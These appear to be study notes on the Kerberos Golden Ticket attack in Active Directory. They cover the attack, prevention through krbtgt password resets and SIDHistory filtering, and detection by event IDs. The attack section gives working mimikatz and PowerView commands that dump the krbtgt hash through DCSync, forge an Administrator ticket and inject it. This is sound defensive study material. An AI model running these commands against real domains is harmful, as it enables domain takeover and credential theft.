Description:

  - Kerberos GOlden Ticket is an attack in which threat agents can create/generate
    tickets for any user in the Domain, therefore acting as a Domain Controller.

  - When Domain is created, the user account krbtgt is created by default. krbgt
    is a disabled account that cannot be deleted, renamed, or enabled. the DC's 
    service will use the password of krbgt to derive a key with which it signs all
    kerberos tickets. 

  - Any user possessing the password's hash of krbgt can create valid kerberos TGTs

  - Golden Ticket attack allows us to escalate rights from any child domain to the 
    parent in the same forest

  - Occurs after an adversary has gained Domain Admin privileges.


Attack:

  - Utilize mimikatz with the following arguments:
    /domain: the domain's name
    /sid: the domain's SID value
    /rc4: the password's hash of krbgt
    /user: the username for which mimikatz will issue the ticket
    /id: relative ID (last part of SID) for the user for whom Mimikatz will issue
    the ticket.
    /renewmax: the maximum number of days the ticket can be renewed
    /endin: end of life for the ticket

  - First, obtain the password's hash of krbgt and the SID value of the domain
    mimikatz.exe
    lsadump::dcsync /domain:eagle.local /user:krbtgt

    powershell -exec bypass

    .\PowerView.ps1
    Get-DomainSID

    kerberos::golden /domain:eagle.local /sid:xxxxxxxxxxx /rc4:xxxxxxxxxxxxxxxx /user:Administrator /id:500 /renewmax:7 /endin:8 /ptt
      - /ptt passes the ticket into the current session

    klist
      - This verifies the ticket

    dir \\dc1\c$
      - Lists the content of the C$ share of DC1 to verify the ticket is working.



Prevention:
  - Block privileged users from authenticating to any device.

  - Periodically reset the password of the krbtgt account; the secrecy of this hash 
    value is crucial to Active Directory. When resetting the password of krbtgt (regardless 
    of the password's strength), it will always be overwritten with a new randomly generated 
    and cryptographically secure one. Utilizing Microsoft's script for changing the password 
    of krbtgt KrbtgtKeys.ps1 is highly recommended as it has an audit mode that checks the 
    domain for preventing impacts upon password change. It also forces DC replication across 
    the globe so all Domain Controllers sync the new value instantly, reducing potential 
    business disruptions.

  - Enforce SIDHistory filtering between the domains in forests to prevent the escalation 
    from a child domain to a parent domain (because the escalation path involves abusing the 
    SIDHistory property by setting it to that of a privileged group, for example, Enterprise Admins). 
    However, doing this may result in potential issues in migrating domain



Detection:

  - Correlating users' behavior

  - Proactively monitor Event 4624 ad 4625

  - 4675 and 4769

  - If an Active Directory forest has been compromised, we need to reset all users' passwords and revoke 
    all certificates, and for krbtgt, we must reset its password twice (in every domain). The password 
    history value for the krbtgt account is 2. Therefore it stores the two most recent passwords. By 
    resetting the password twice, we effectively clear any old passwords from the history, so there is no 
    way another DC will replicate this DC by using an old password. However, it is recommended that this 
    password reset occur at least 10 hours apart from each other (maximum user ticket lifetime); otherwise, 
    expect some services to break if done in a shorter period.



































